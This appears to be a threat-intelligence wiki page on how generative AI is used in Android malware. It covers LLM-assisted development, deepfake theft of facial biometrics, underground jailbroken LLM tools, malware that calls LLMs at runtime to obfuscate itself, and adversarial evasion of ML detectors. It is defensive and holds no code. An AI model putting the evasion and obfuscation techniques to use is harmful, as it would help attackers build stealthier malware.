AI-Assisted Malware¶
Large language models and generative AI are being integrated into the Android malware lifecycle at multiple stages: code generation, social engineering, biometric fraud, and evasion of ML-based detectors. The impact so far is more about lowering the skill barrier and accelerating development than creating fundamentally new capabilities, but runtime AI integration and deepfake-based biometric fraud represent genuinely novel attack vectors.
See also: Phishing Techniques, Play Store Evasion, C2 Communication
Distinguishing Hype from Reality
Recorded Future introduced the "AI Malware Maturity Model" (AIM3) to classify what truly counts as AI malware. Most current usage is LLMs as a "force multiplier" for existing workflows. OpenAI stated in their October 2024 threat report that "the use of ChatGPT has not led to any significant breakthroughs in malware creation." The distinction between AI-assisted and AI-native malware matters: most of what's observed is the former.
Categories¶
1. LLM-Assisted Malware Development¶
Threat actors using ChatGPT, Gemini, or underground alternatives to write, debug, and refine malware code.
STORM-0817: Iranian APT Using ChatGPT for Android Surveillanceware
OpenAI disclosed in October 2024 that STORM-0817, an Iran-based threat actor, used ChatGPT to debug and develop Android malware. The malware was described as "relatively rudimentary" surveillanceware targeting contacts, call logs, installed packages, screenshots, browsing history, location, and files from external storage. They developed two Android packages (com.example.myttt and com.mihanwebmaster.ashpazi) and used ChatGPT to build server-side C2 code on a WAMP stack with the domain stickhero[.]pro.
OpenAI assessed that ChatGPT did not provide capabilities beyond what was already publicly available. BleepingComputer and SC Media covered the disclosure.
HP Wolf Security: AI-Generated Malware
HP Wolf Security identified in September 2024 a campaign targeting French-speaking users with VBScript and JavaScript showing strong indicators of generative AI authorship: structured comments explaining each line, native-language variable names, and consistent formatting. The malware deployed AsyncRAT. HP characterized this as one of the first documented in-the-wild cases of AI-generated malware.
2. Deepfake Biometric Fraud¶
The most impactful AI-driven mobile attack vector to date: stealing facial biometric data and using AI face-swapping to bypass bank facial recognition.
GoldPickaxe: Facial Biometric Theft
Group-IB disclosed in February 2024 that GoldPickaxe, developed by Chinese-speaking threat group GoldFactory, steals facial biometric data on both Android and iOS to generate deepfakes for bypassing bank facial recognition.
| Aspect | Detail |
|---|---|
| Targets | Thailand, Vietnam banking apps |
| Disguise | Government service apps (Thai "Digital Pension" app) |
| Collection | Prompts victim to record video: blink, smile, face left/right, nod, open mouth |
| Usage | AI face-swapping services create deepfakes to log into victim's banking app |
| Confirmation | Thai police confirmed criminals using captured face scans to bypass banking facial recognition |
This represents a genuine paradigm shift: the malware itself is relatively simple (record video, exfiltrate), but the AI backend (deepfake generation) enables a novel attack that didn't previously exist.
AI Voice Cloning in Mobile Vishing
Voice phishing surged 442% in 2025. Group-IB documented AI voice cloning in social engineering attacks delivered over mobile calls. Modern AI speech models create realistic impersonation from seconds of target audio. Asia-Pacific saw a 194% surge in deepfake-related fraud attempts in 2024 vs 2023. No public reports document Android malware that autonomously conducts voice cloning; the current model is attackers using separate AI tools then calling victims on their phones.
3. Underground Malicious LLM Tools¶
Custom, jailbroken, and fine-tuned models sold on underground forums for generating phishing content and malware code.
| Tool | First Seen | Base Model | Price | Status |
|---|---|---|---|---|
| WormGPT | July 2023 | GPT-J 6B | ~60 EUR/month, $220 lifetime | Active. New variants on Grok and Mixtral (2024-2025) |
| FraudGPT | July 2023 | Unknown | $90-200/month, $1,700/year | Sold by "CanadianKingpin12" on dark web. LevelBlue coverage |
| KawaiiGPT | July 2025 | Open-source | Free (GitHub) | Unit 42 calls it "entry-level but effective" |
KrebsOnSecurity profiled the WormGPT developer. The original version underperformed expectations (described as "pretty lame" by users). The real significance is the trend: commoditizing AI-assisted cybercrime tools that remove technical barriers for low-skill operators.
DarkBERT
DarkBERT is a legitimate academic project: a BERT-based model pre-trained on 2.2TB of Tor dark web data for cybersecurity research (classifying ransomware leak sites, detecting information leaks). Claims of malicious derivatives (DarkBART) appeared on underground forums but remain largely unverified.
4. Runtime AI Integration¶
Malware that makes LLM API calls during execution to modify its own behavior.
Google Threat Intelligence Group cataloged five malware families with runtime AI integration in their November 2025 report (The Hacker News coverage):
| Family | Mechanism | Detail |
|---|---|---|
| PROMPTFLUX | Gemini 1.5 Flash API | VBScript malware queries Gemini to rewrite its own source code hourly. "Thinking Robot" component instructs the LLM to act as an "expert VB Script obfuscator." Self-propagates via Windows Startup folder. |
| PROMPTLOCK | AI-generated payloads | Experimental ransomware using AI to generate Lua encryption payloads at runtime. Targets Windows, macOS, Linux. |
| PROMPTSTEAL | Hugging Face API | Queries Qwen2.5-Coder-32B-Instruct to generate system reconnaissance commands. Used by Russian actor APT28 in Ukraine. |
| FRUITSHELL | Hardcoded prompts | PowerShell reverse shell designed to bypass LLM-based security analysis tools. |
These are not Android-specific but represent the state of the art in AI-integrated malware. The techniques (polymorphic code rewriting via LLM, AI-generated payloads, prompt-based evasion) are transferable to mobile.
5. AI-Assisted Campaigns¶
EvilAI Campaign (Trend Micro, September 2025): Operators use AI-generated code and social engineering to disguise malware as legitimate applications (PDF editors, AI-enhanced tools). Professional interfaces with valid digital signatures. AES-encrypted C2 communication. 56 incidents in Europe, 29 in the Americas, 29 in Asia/Middle East/Africa in one week of monitoring.
FunkSec (Check Point, January 2025): Ransomware-as-a-service with an AI-assisted Rust-based encryptor. 85+ claimed victims in its first month. Check Point assessed the codebase organization indicated AI assistance that enabled "rapid iteration despite the author's apparent lack of technical expertise."
Adversarial ML Against Android Malware Detectors¶
Academic research demonstrating how machine learning can be used to evade ML-based Android malware detection systems. These are proof-of-concept attacks, not observed in the wild, but they demonstrate the theoretical ceiling.
| Paper | Venue | Year | Technique | Evasion Rate |
|---|---|---|---|---|
| Automated Mass Malware Factory | NDSS | 2025 | Adversarial piggybacking: malicious rider extraction + adversarial perturbation + benign carrier selection | 88.3% vs Drebin/MaMaDroid, 76-92% vs commercial engines |
| GEAAD | Nature Scientific Reports | 2025 | DOpGAN (dual-opponent GAN) altering opcode distribution features | Misclassifies malware as benign |
| EvadeDroid | Computers & Security | 2023 | Black-box evasion via problem-space transformations from benign donors | 80-95% with 1-9 queries |
| LAMLAD | arXiv | 2024 | Dual-agent LLM (manipulator + analyzer) bypassing ML classifiers | Up to 97% in 3 attempts |
| RL-based evasion | Alexandria Engineering Journal | 2024 | GANs + PPO reinforcement learning generating adversarial payloads | 53.84% vs gradient-boosted decision trees |
Vendor Reports¶
| Report | Organization | Date | Key Finding |
|---|---|---|---|
| Influence and Cyber Operations | OpenAI | October 2024 | 20+ instances of threat actor misuse including STORM-0817 Android malware |
| Disrupting Malicious Uses | OpenAI | February 2025 | Continued fraud schemes and state-sponsored abuse documentation |
| AI Security Report 2025 | Check Point | April 2025 | AI used across entire cyber attack lifecycle from code generation to campaign optimization |
| Advances in Threat Actor Usage | Google GTIG | November 2025 | Novel AI-enabled malware families (PROMPTFLUX, PROMPTLOCK) with runtime LLM calls |
| The Dual-Use Dilemma | Unit 42 | 2025 | Underground forums selling custom, jailbroken, and open-source AI hacking tools |
| 2024 Phishing Intelligence Report | SlashNext | 2024 | Credential phishing attacks increased 703% in H2 2024; AI a key driver |
What Is Confirmed vs. Theoretical¶
| Status | Category |
|---|---|
| Observed in the wild | LLM-assisted malware code writing (STORM-0817, HP Wolf Security AsyncRAT) |
| Observed in the wild | Facial biometric theft for deepfake banking fraud (GoldPickaxe) |
| Observed in the wild | Underground malicious LLM tools sold and used (WormGPT, FraudGPT, KawaiiGPT) |
| Observed in the wild | Runtime LLM integration in malware (PROMPTFLUX, PROMPTLOCK, PROMPTSTEAL) |
| Observed in the wild | AI-generated phishing at scale (703% increase in credential phishing) |
| Academic PoC only | GAN/RL-based adversarial attacks against Android malware ML detectors |
| Unverified | DarkBERT malicious derivatives |
| Not yet observed | Android malware autonomously conducting AI voice cloning attacks |